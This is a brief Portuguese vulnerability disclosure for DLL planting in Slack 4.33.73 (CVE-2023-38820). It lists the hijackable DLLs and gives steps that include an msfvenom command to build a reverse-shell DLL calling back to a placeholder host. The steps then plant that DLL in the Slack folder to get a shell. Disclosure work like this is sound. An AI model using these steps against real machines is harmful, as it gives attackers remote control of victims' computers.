DLL-Planting-Slack-4.33.73-CVE-2023-38820
DLL Planting no Slack 4.33.73 - CVE-2023-38820
Descoberto por: Idan Malihi
Descrição
Um problema no Slack v.4.33.73 permite que um atacante local execute código arbitrário através do mecanismo de carregamento de DLL nos arquivos profapi.dll, CRYPTBASE.dll, KBDUS.DLL, DPAPI.dll, MSASN1.dll, mf.dll, mfplat.dll e RTWorkQ.DLL.
Passos para Reproduzir
Para explorar a vulnerabilidade, um atacante deve baixar e instalar o programa Slack e seguir os passos:
- Crie um arquivo dll malicioso com o msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f dll -o profapi.dll
- Transfira o arquivo dll malicioso para o computador da vítima
- Abra o caminho do Slack: "C:\Users\idan.m\AppData\Local\slack\app-4.33.73"
- Transfira a dll maliciosa para o caminho do Slack e nomeie-a como "KBDUS.DLL" para o exemplo.
- Abra um listener netcat ou metasploit
- Abra o Slack.exe
- Obtenha uma reverse shell.